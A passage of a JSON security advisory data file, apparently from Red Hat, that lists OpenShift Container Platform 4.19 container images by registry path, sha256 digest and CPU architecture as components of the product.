"product_reference": "registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:3dc93509b8cad942ffeea32ba1c75db4b94a66a8c1a6d7b29f13ed6ec83e5f9b_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:ae91dc01aca5115ba88290f86ab266ad69b86c68c83097adafb82defdfc5c524_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:ae91dc01aca5115ba88290f86ab266ad69b86c68c83097adafb82defdfc5c524_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:ae91dc01aca5115ba88290f86ab266ad69b86c68c83097adafb82defdfc5c524_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:67f9c3e3f77df4be9e4925fe7c5fb4cb95d770395bbb1b32847c7100d8f9e8fe_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:67f9c3e3f77df4be9e4925fe7c5fb4cb95d770395bbb1b32847c7100d8f9e8fe_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:67f9c3e3f77df4be9e4925fe7c5fb4cb95d770395bbb1b32847c7100d8f9e8fe_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:ef09a660c5bd1b44464ed961ade4f9ceef47dfe1005efde15de94631dadebf4f_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:ef09a660c5bd1b44464ed961ade4f9ceef47dfe1005efde15de94631dadebf4f_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:ef09a660c5bd1b44464ed961ade4f9ceef47dfe1005efde15de94631dadebf4f_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:d1a5ebdd8e8fcd15749e48a18cf340a309c6c219c8adf85d2df1caa773784d86_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:d1a5ebdd8e8fcd15749e48a18cf340a309c6c219c8adf85d2df1caa773784d86_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:d1a5ebdd8e8fcd15749e48a18cf340a309c6c219c8adf85d2df1caa773784d86_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:de7f8ba8b4ed81e733af2d6b40e2dbb97c7afdc627973bfb838bd69ed9183eba_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:de7f8ba8b4ed81e733af2d6b40e2dbb97c7afdc627973bfb838bd69ed9183eba_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:de7f8ba8b4ed81e733af2d6b40e2dbb97c7afdc627973bfb838bd69ed9183eba_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:15b866541c161693e74ad7106aec45b9713f81e1f3e2f10deb0822b58fbb884e_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:15b866541c161693e74ad7106aec45b9713f81e1f3e2f10deb0822b58fbb884e_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:15b866541c161693e74ad7106aec45b9713f81e1f3e2f10deb0822b58fbb884e_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:240132f7cf6ec28b4f711323b5c9f10ba76e85ba0ed2e66c663096089fdcc128_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:240132f7cf6ec28b4f711323b5c9f10ba76e85ba0ed2e66c663096089fdcc128_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:240132f7cf6ec28b4f711323b5c9f10ba76e85ba0ed2e66c663096089fdcc128_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:2191714083728cc0984775c5b8c3ee972723c1378058f0923ab60036345d9825_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:2191714083728cc0984775c5b8c3ee972723c1378058f0923ab60036345d9825_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:2191714083728cc0984775c5b8c3ee972723c1378058f0923ab60036345d9825_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:249b48b699ef21517d11a3533293184b1524b5907fec00593a98f0581363dc12_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:249b48b699ef21517d11a3533293184b1524b5907fec00593a98f0581363dc12_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:249b48b699ef21517d11a3533293184b1524b5907fec00593a98f0581363dc12_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:660ad818c22efdd4fb965ded889c7ed08b331cb8d50c145bd4a34e74158f790a_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:660ad818c22efdd4fb965ded889c7ed08b331cb8d50c145bd4a34e74158f790a_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:660ad818c22efdd4fb965ded889c7ed08b331cb8d50c145bd4a34e74158f790a_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:deb01110f819b3534a2bd24b5406c69bcf5011eaebdeec438a31f1cd68f18029_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:deb01110f819b3534a2bd24b5406c69bcf5011eaebdeec438a31f1cd68f18029_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:deb01110f819b3534a2bd24b5406c69bcf5011eaebdeec438a31f1cd68f18029_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:255b3979a3a054696f21f437998c892b5738cbbcdc021b0a22752f1d9bb48712_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:255b3979a3a054696f21f437998c892b5738cbbcdc021b0a22752f1d9bb48712_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:255b3979a3a054696f21f437998c892b5738cbbcdc021b0a22752f1d9bb48712_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:d665a06a23572a2bcf3345f9c22b2b9895292e1f43d5532b793a3ea4df0c42c8_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:d665a06a23572a2bcf3345f9c22b2b9895292e1f43d5532b793a3ea4df0c42c8_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:d665a06a23572a2bcf3345f9c22b2b9895292e1f43d5532b793a3ea4df0c42c8_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:086285dd82aadc71803c847a06a2e0727b4fbb09f07a5bf95979ebc50bb95e82_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:086285dd82aadc71803c847a06a2e0727b4fbb09f07a5bf95979ebc50bb95e82_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:086285dd82aadc71803c847a06a2e0727b4fbb09f07a5bf95979ebc50bb95e82_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:0f5c719b22dbba95b6d61db0c63ba8107689a7d61f6944e0d2dc5fa3e693d25e_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:0f5c719b22dbba95b6d61db0c63ba8107689a7d61f6944e0d2dc5fa3e693d25e_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:0f5c719b22dbba95b6d61db0c63ba8107689a7d61f6944e0d2dc5fa3e693d25e_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:1452416d5cfd9acae6f0bf60da783ec8cf632784655f4602462cf380cd7fe518_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:1452416d5cfd9acae6f0bf60da783ec8cf632784655f4602462cf380cd7fe518_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:1452416d5cfd9acae6f0bf60da783ec8cf632784655f4602462cf380cd7fe518_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:b13a67c30437a6950f41cdda853305d03ac24809746bdca955782db1c59824b1_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:b13a67c30437a6950f41cdda853305d03ac24809746bdca955782db1c59824b1_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:b13a67c30437a6950f41cdda853305d03ac24809746bdca955782db1c59824b1_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:43f58c25df6d439ab60c6a7fd905db92d67678bf55732103069b9d3ce9a6ee1d_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:43f58c25df6d439ab60c6a7fd905db92d67678bf55732103069b9d3ce9a6ee1d_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:43f58c25df6d439ab60c6a7fd905db92d67678bf55732103069b9d3ce9a6ee1d_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:5eca83117e60a69246033c3cedcc2e2962e0f0a6ae6d6d7e3c35546cdc78ce70_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:5eca83117e60a69246033c3cedcc2e2962e0f0a6ae6d6d7e3c35546cdc78ce70_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:5eca83117e60a69246033c3cedcc2e2962e0f0a6ae6d6d7e3c35546cdc78ce70_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:daddd3f94f513bfce03ea0c5aa406164838aa7bc41c3251b02686fd86da09d7a_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:daddd3f94f513bfce03ea0c5aa406164838aa7bc41c3251b02686fd86da09d7a_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:daddd3f94f513bfce03ea0c5aa406164838aa7bc41c3251b02686fd86da09d7a_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:f1a3870617f3e6c0774b5484820351c404cabe3161684c6edf3b81554cf9f1de_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:f1a3870617f3e6c0774b5484820351c404cabe3161684c6edf3b81554cf9f1de_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:f1a3870617f3e6c0774b5484820351c404cabe3161684c6edf3b81554cf9f1de_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:4f54884bb854edec3a1a28ba089ddc068edc3ad0677637dd9b033a1c0ff8052c_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:4f54884bb854edec3a1a28ba089ddc068edc3ad0677637dd9b033a1c0ff8052c_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:4f54884bb854edec3a1a28ba089ddc068edc3ad0677637dd9b033a1c0ff8052c_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:834a2b63a74d7af617155da8f25a36f196b7c16a78154468b1cb88a10fdfa88d_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:834a2b63a74d7af617155da8f25a36f196b7c16a78154468b1cb88a10fdfa88d_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:834a2b63a74d7af617155da8f25a36f196b7c16a78154468b1cb88a10fdfa88d_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:3f79fe8b748ce5015d5d71ce8da20bbff7241868e87066d1d50083a3ceb91bfe_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:3f79fe8b748ce5015d5d71ce8da20bbff7241868e87066d1d50083a3ceb91bfe_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:3f79fe8b748ce5015d5d71ce8da20bbff7241868e87066d1d50083a3ceb91bfe_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:66745a12cf917414d197c589e7e57a62958da4c66d5372e848e40568d8ddfafc_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:66745a12cf917414d197c589e7e57a62958da4c66d5372e848e40568d8ddfafc_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:66745a12cf917414d197c589e7e57a62958da4c66d5372e848e40568d8ddfafc_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:900e5ff2f8ea86f0864c6a3cd1707a620427189f5bfffa0bb0ea9a8c0ed85330_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:900e5ff2f8ea86f0864c6a3cd1707a620427189f5bfffa0bb0ea9a8c0ed85330_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:900e5ff2f8ea86f0864c6a3cd1707a620427189f5bfffa0bb0ea9a8c0ed85330_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:c029ff100811f13c0ba79c03044e0c6f096567511c336e4d1ecced6e900c2acd_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:c029ff100811f13c0ba79c03044e0c6f096567511c336e4d1ecced6e900c2acd_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:c029ff100811f13c0ba79c03044e0c6f096567511c336e4d1ecced6e900c2acd_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:37fe6420e98e7d1927492a7a40fd01578cfaf441530b7bf2f85cc7d593d7b097_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:37fe6420e98e7d1927492a7a40fd01578cfaf441530b7bf2f85cc7d593d7b097_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:37fe6420e98e7d1927492a7a40fd01578cfaf441530b7bf2f85cc7d593d7b097_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:480d7e114879e0c9bcfd62250af7f2f7b4a25e7d4cca65d97c422349fe164334_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:480d7e114879e0c9bcfd62250af7f2f7b4a25e7d4cca65d97c422349fe164334_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:480d7e114879e0c9bcfd62250af7f2f7b4a25e7d4cca65d97c422349fe164334_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:6f49794879ad8a54b4a9ba77661ebdf84cb90a048d1472c1f878c10a9ecc46e6_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:6f49794879ad8a54b4a9ba77661ebdf84cb90a048d1472c1f878c10a9ecc46e6_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:6f49794879ad8a54b4a9ba77661ebdf84cb90a048d1472c1f878c10a9ecc46e6_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:77c778debce0cb2eff5f5e66a3db3e30905e0138de3ddc3cd5330d2a79ec2cf9_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:77c778debce0cb2eff5f5e66a3db3e30905e0138de3ddc3cd5330d2a79ec2cf9_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:77c778debce0cb2eff5f5e66a3db3e30905e0138de3ddc3cd5330d2a79ec2cf9_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:6aef6b3ea8ceb252107d24252c9c155e21d42825343e2a824d869f897a86da4f_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:6aef6b3ea8ceb252107d24252c9c155e21d42825343e2a824d869f897a86da4f_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:6aef6b3ea8ceb252107d24252c9c155e21d42825343e2a824d869f897a86da4f_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:895cb0d9b4715a75c1ffa4539bbd86c14f774e664ab16f5df4bc3e55ef537225_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:895cb0d9b4715a75c1ffa4539bbd86c14f774e664ab16f5df4bc3e55ef537225_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:895cb0d9b4715a75c1ffa4539bbd86c14f774e664ab16f5df4bc3e55ef537225_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:99fc0e641a6014bad4027471174578ba22c0a4a99c05b6bca1e8c838bbda0a90_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:99fc0e641a6014bad4027471174578ba22c0a4a99c05b6bca1e8c838bbda0a90_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:99fc0e641a6014bad4027471174578ba22c0a4a99c05b6bca1e8c838bbda0a90_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:aee32f17c4c4aa3deaca4a1884efc7c1a05d4fdadea145b247c4364e9e82086a_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:aee32f17c4c4aa3deaca4a1884efc7c1a05d4fdadea145b247c4364e9e82086a_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:aee32f17c4c4aa3deaca4a1884efc7c1a05d4fdadea145b247c4364e9e82086a_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:07f2b6c01f22078c6b6eea7916982ebfcf6f992daf0d80af7b18972e6c484868_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:07f2b6c01f22078c6b6eea7916982ebfcf6f992daf0d80af7b18972e6c484868_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:07f2b6c01f22078c6b6eea7916982ebfcf6f992daf0d80af7b18972e6c484868_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:3efbeb0ba231cc16b69a86c43c28aa02b7e773413b361ceaf82c72cb215dc187_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:3efbeb0ba231cc16b69a86c43c28aa02b7e773413b361ceaf82c72cb215dc187_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:3efbeb0ba231cc16b69a86c43c28aa02b7e773413b361ceaf82c72cb215dc187_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:a212996fe27771f82406dc36d68e07e29ecf975834c3cde6395b35cd259edbe9_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:a212996fe27771f82406dc36d68e07e29ecf975834c3cde6395b35cd259edbe9_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:a212996fe27771f82406dc36d68e07e29ecf975834c3cde6395b35cd259edbe9_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:b7f1f48335150e9e3ff89c0c349345f2c7fb6d7cf27793d263cca791d53f260c_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:b7f1f48335150e9e3ff89c0c349345f2c7fb6d7cf27793d263cca791d53f260c_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:b7f1f48335150e9e3ff89c0c349345f2c7fb6d7cf27793d263cca791d53f260c_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
